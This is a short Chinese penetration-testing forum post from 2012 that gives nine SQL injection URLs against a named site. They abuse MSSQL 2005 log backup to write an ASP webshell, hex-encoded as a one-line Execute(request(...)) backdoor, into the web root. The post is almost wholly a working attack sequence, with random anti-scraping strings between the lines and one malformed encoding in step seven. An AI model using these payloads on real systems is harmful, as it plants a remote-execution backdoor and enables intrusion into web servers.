中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
http://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：
! k/ Q2 U2 Z0 K% m# e8 x+ T1 Rhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第三步
" ~0 {3 |& C9 H- Nhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--
8 r9 l% _4 ]: b5 T* g  m+ K
第四步
" M# b* X- E: X1 @& E( K* i# fhttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--
4 B4 }: r2 c: o1 F$ c! t9 C
第五步
& E4 A* w" b# {! \3 _: Q2 q. J( t% hhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

/ J% ~8 {+ X  v7 s( }第六步
" s5 {4 a8 t# l2 `2 shttp://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--
1 W# g6 _( o3 S! x9 o
第七步
' _& \) q- q) N7 w. e  H) M& ^http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
# o0 k7 [) M. W
# y% x5 e8 c: I, [- h) G第八步
& t9 x# |* N4 M4 D3 V/ a! Thttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

第九步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
. q5 E2 v# [5 X7 e, O

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2